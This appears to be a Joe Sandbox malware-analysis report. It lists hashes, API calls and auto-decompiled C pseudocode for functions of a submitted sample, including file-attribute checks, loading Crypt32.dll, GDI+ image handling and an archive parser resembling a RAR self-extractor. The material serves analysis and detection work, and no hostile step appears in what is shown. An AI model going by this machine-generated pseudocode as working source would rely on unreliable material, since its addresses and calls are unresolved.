Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 323578f766d348e1e82f4cff31202711f52ebd9e57ff9ac7387ef03c247ed07c
Instruction ID: a5bba40ad39edd97bdab75928969ecfa8607d8f8168293510e6efa2960721d45
Opcode Fuzzy Hash: 323578f766d348e1e82f4cff31202711f52ebd9e57ff9ac7387ef03c247ed07c
Instruction Fuzzy Hash: C7F06572608654DFC710DB5DDD05B55FBE8FB4DB20F0443AAF419A3760CB756801CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A387 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E6A387(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00E7E630();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00E6B85C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x00e6a38f
0x00e6a398
0x00e6a39e
0x00e6a3a3
0x00e6a3c4
0x00e6a3ca
0x00e6a3ca
0x00e6a3d2

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00E6A37C,?,00E67776,?,?,?,?), ref: 00E6A398
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E6A37C,?,00E67776,?,?,?,?), ref: 00E6A3C4

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0b8b6f096b432b7f1a0e9b3a591bb4f74d83388cc07fdfb0e3ef88f5f47cda0b
Instruction ID: e9f45bafeccd2264b2a759d99d8bb3c7e1de4d584e77269d7fc998a4e39b4e79
Opcode Fuzzy Hash: 0b8b6f096b432b7f1a0e9b3a591bb4f74d83388cc07fdfb0e3ef88f5f47cda0b
Instruction Fuzzy Hash: 9BE09B359401285BCB10AB65EC04BDD779C9B083E5F0452B2FD44F3291D7709D448ED1

Uniqueness

Uniqueness Score: -1.00%

Function 00E70360 Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E70360(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00E7E630();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t7;
				if(_t7 != 0) {
					E00E6BB55(_t14,  &_v4100, _a4,  &_v4100, 0x800); // executed
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x00e70368
0x00e7037b
0x00e70381
0x00e70383
0x00e70391
0x00e7039d
0x00e7039d
0x00e703a7

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E7037B
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E6EE61,Crypt32.dll,00000000,00E6EEE5,?,?,00E6EEC7,?,?,?), ref: 00E7039D

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 13cdfa034527758da79d6f21e34ecb2e8ff1887d4c38b17a8f62dfe7f94104cf
Instruction ID: 20032f3fae051765aa3542a0eb9513c97bc68e606887a244f3fdcc4a8a245fb1
Opcode Fuzzy Hash: 13cdfa034527758da79d6f21e34ecb2e8ff1887d4c38b17a8f62dfe7f94104cf
Instruction Fuzzy Hash: 86E0127691112C6BDB11AAA5EC08FD777ACEF0C382F0440A6B948E2144DA749A948BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00E79D6F Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E79D6F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xe94670;
				if(_a8 == 0) {
					L00E7E4F4(); // executed
				} else {
					L00E7E4FA();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00e79d72
0x00e79d74
0x00e79d76
0x00e79d79
0x00e79d7c
0x00e79d84
0x00e79d85
0x00e79d88
0x00e79d8e
0x00e79d97
0x00e79d90
0x00e79d90
0x00e79d90
0x00e79d9c
0x00e79da2
0x00e79dab

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E79D90
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E79D97

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 6306c0b1ff22d288a46fcb17973e6cc881f4b20712a4bd7607c7dd4559a4c338
Instruction ID: c6907f00d600a45e3d08cda67beaf3b8167bec07124a8f61fade6e641dd3d7c8
Opcode Fuzzy Hash: 6306c0b1ff22d288a46fcb17973e6cc881f4b20712a4bd7607c7dd4559a4c338
Instruction Fuzzy Hash: 76E0ED75905218EBCB24EF98C501A9DB7F8EF08721F10D09BE859A3301E7B06E049B91

Uniqueness

Uniqueness Score: -1.00%

Function 00E823FC Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E823FC(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00E83567(__eflags, E00E82340); // executed
				 *0xe9e680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00E83615(__eflags, _t1, 0xec1054);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00E8242F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00e82401
0x00e82406
0x00e8240f
0x00e8241a
0x00e82420
0x00e82421
0x00e82423
0x00e8242e
0x00e82425
0x00e82425
0x00000000
0x00e82425
0x00e82411
0x00e82411
0x00e82413
0x00e82413

APIs

Part of subcall function 00E83567: try_get_function.LIBVCRUNTIME ref: 00E8357C

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8241A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E82425

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 62958b23fd41c27bd8f85a419e625c47c7eaefcbd8edc1fca38d66ac5a63dde3
Instruction ID: daf5903c76334ecc069efa36bc9b276057666b309cbee203b360a252a8d572fb
Opcode Fuzzy Hash: 62958b23fd41c27bd8f85a419e625c47c7eaefcbd8edc1fca38d66ac5a63dde3
Instruction Fuzzy Hash: 70D0A930904301A82808B77928038CC23C09962FB83A0369EFB3CBA1C3FA1080067331

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF2E Relevance: 3.0, APIs: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E00E7DF2E(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0xe95560 & 0x00001000) == 0) {
					return _t5;
				} else {
					E00E7DFDD(__ecx, __esi);
					_t8 =  *0xec0ce0 + 1;
					 *0xec0ce0 = _t8;
					if(_t8 == 1) {
						E00E7E12F(4, 0xec0ce4); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0xe9e668; // 0x8ae5c3d8
					_v8 = _t9 ^ _t26;
					if(E00E7DF61() == 0) {
						 *0xec0cdc = 0;
					} else {
						 *0xe93260(0xec0cdc, _t20);
						 *((intOrPtr*)( *0xec0cd8))();
					}
					return E00E7EEFA(_v8 ^ _t24);
				}
			}

0x00e7df2e
0x00e7df2e
0x00e7df38
0x00e7df60
0x00e7df3a
0x00e7df3a
0x00e7df44
0x00e7df45
0x00e7df4d
0x00e7df56
0x00e7df56
0x00e7e1da
0x00e7e1dc
0x00e7e1dd
0x00e7e1e4
0x00e7e1ee
0x00e7e209
0x00e7e1f0
0x00e7e1fe
0x00e7e204
0x00e7e206
0x00e7e220
0x00e7e220

APIs

DloadLock.DELAYIMP ref: 00E7DF3A
DloadProtectSection.DELAYIMP ref: 00E7DF56

Part of subcall function 00E7E12F: DloadObtainSection.DELAYIMP ref: 00E7E13F

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 62691214df633a23bd2797733c6df7d862b993456ef7e28642d7b479db664a80
Instruction ID: 502b67f9326f0e0cc392a0b8559cf4187dd8c813194e0dd167422c7dab491655
Opcode Fuzzy Hash: 62691214df633a23bd2797733c6df7d862b993456ef7e28642d7b479db664a80
Instruction Fuzzy Hash: 47D01230709204CEC30AE7159D47F5866F0BB08348FA4A657F66FF22A5CB76449AD701

Uniqueness

Uniqueness Score: -1.00%

Function 00E612E6 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E612E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00e612ed
0x00e61302
0x00e61308

APIs

GetDlgItem.USER32(?,?), ref: 00E612FB
ShowWindow.USER32(00000000), ref: 00E61302

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 7089b3d8370a0ed622aa24a3d5a039a3256a04e72c4bc1f1c14d1098429fe014
Instruction ID: f3cd647aff087d488e59420f83e2225353f958423ff112f311a92cb91970248d
Opcode Fuzzy Hash: 7089b3d8370a0ed622aa24a3d5a039a3256a04e72c4bc1f1c14d1098429fe014
Instruction Fuzzy Hash: EEC01232058200BECB010BB2DC09C2FBBA8EBA5212F08C928B2A5D0061C23AC014DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00E619C6 Relevance: 1.8, APIs: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00E619C6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E00E7E554(E00E91F93, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0xe93260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E00E61DC8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E00E61380(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0xe93260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0xe93260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E00E615C2(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E00E63A31(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E00E66D41(__eflags, 0x1b, _t172 + 0x24);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E00E70131(_t172 + 0x6cfa, _t172 + 0x24, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0xe93260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E00E63A31(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0xe93260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E00E61EFA(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E00E61EFA(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E00E63A31(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0xe93260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E00E66D41(__eflags, 0x3c, _t172 + 0x24);
								goto L1;
							}
							E00E615C2(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E00E61DC8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0xe93260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0xe93260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0xe93260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0xe93260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}

0x00e619c6
0x00e619c6
0x00e619cb
0x00e619d4
0x00e619dc
0x00e619e3
0x00e619ea
0x00e619f6
0x00e61a03
0x00e61a0e
0x00e61a11
0x00e61a17
0x00e61a1c
0x00e61a1e
0x00e61a64
0x00e61a6b
0x00e61a73
0x00e61a7b
0x00e61a89
0x00e61a8f
0x00e61a97
0x00e61a9a
0x00e61a9c
0x00e61a9e
0x00e61aa1
0x00e61aa3
0x00e61b46
0x00e61b46
0x00e61b4d
0x00e61b50
0x00e61b5c
0x00e61b5c
0x00e61b5c
0x00e61b60
0x00e61b65
0x00e61b65
0x00e61b6b
0x00e61b6e
0x00e61b80
0x00e61b83
0x00e61bbd
0x00e61bc7
0x00e61bcb
0x00e61bd3
0x00e61bd8
0x00e61bdb
0x00e61bdd
0x00e61c1f
0x00e61c1f
0x00e61c22
0x00e61c22
0x00e61c28
0x00e61c2a
0x00e61c36
0x00e61c36
0x00e61c3d
0x00e61c43
0x00e61c43
0x00e61c45
0x00e61c4d
0x00e61c4d
0x00e61c52
0x00e61c56
0x00000000
0x00e61c5c
0x00e61c5c
0x00e61c5c
0x00e61c66
0x00e61c6c
0x00e61d7e
0x00e61d7e
0x00e61d85
0x00e61d90
0x00e61da0
0x00e61da5
0x00e61da5
0x00e61da7
0x00e61dad
0x00e61db7
0x00e61db7
0x00e61d87
0x00e61d8e
0x00000000
0x00000000
0x00000000
0x00e61d8e
0x00e61c72
0x00e61c79
0x00e61c88
0x00e61c8f
0x00e61c99
0x00e61c9b
0x00e61ca3
0x00e61cac
0x00e61cb5
0x00e61cbe
0x00e61cc7
0x00e61d10
0x00e61d12
0x00e61d17
0x00e61d19
0x00000000
0x00000000
0x00e61cd3
0x00e61cd9
0x00e61cdc
0x00e61cff
0x00e61d02
0x00e61d1d
0x00e61d24
0x00e61d34
0x00e61d34
0x00e61d34
0x00e61d36
0x00e61d36
0x00e61d3c
0x00e61d3f
0x00e61d48
0x00e61d51
0x00e61d5a
0x00e61d63
0x00e61d74
0x00e61d7c
0x00000000
0x00e61d7c
0x00e61d26
0x00e61d2d
0x00000000
0x00000000
0x00e61d31
0x00000000
0x00e61d31
0x00e61d04
0x00e61d07
0x00000000
0x00000000
0x00e61d09
0x00e61d0b
0x00000000
0x00e61d0b
0x00e61cde
0x00e61ce5
0x00e61cf5
0x00e61cf5
0x00e61cf5
0x00e61cf7
0x00e61cf7
0x00000000
0x00e61cf7
0x00e61ce7
0x00e61cee
0x00000000
0x00000000
0x00e61cf2
0x00000000
0x00e61cf2
0x00000000
0x00e61d1b
0x00e61c7b
0x00e61c82
0x00000000
0x00000000
0x00000000
0x00e61c82
0x00e61c56
0x00e61c3f
0x00e61c41
0x00000000
0x00000000
0x00000000
0x00e61c41
0x00e61c2c
0x00e61c30
0x00000000
0x00000000
0x00000000
0x00e61c30
0x00e61bdf
0x00e61be1
0x00e61be4
0x00e61be6
0x00e61beb
0x00e61bf1
0x00e61bf4
0x00000000
0x00000000
0x00e61bfa
0x00e61c01
0x00e61c0c
0x00e61c0e
0x00e61c13
0x00e61c15
0x00e61c18
0x00e61c1b
0x00e61c1d
0x00000000
0x00000000
0x00000000
0x00e61c1d
0x00e61c03
0x00e61c06
0x00000000
0x00000000
0x00000000
0x00e61c06
0x00e61ccc
0x00000000
0x00e61ccc
0x00e61b87
0x00e61b90
0x00e61b95
0x00e61b9d
0x00e61b9f
0x00e61ba2
0x00000000
0x00000000
0x00e61ba8
0x00e61bab
0x00000000
0x00000000
0x00e61bb1
0x00000000
0x00e61bb1
0x00e61b76
0x00000000
0x00e61b76
0x00e61b52
0x00000000
0x00000000
0x00000000
0x00000000
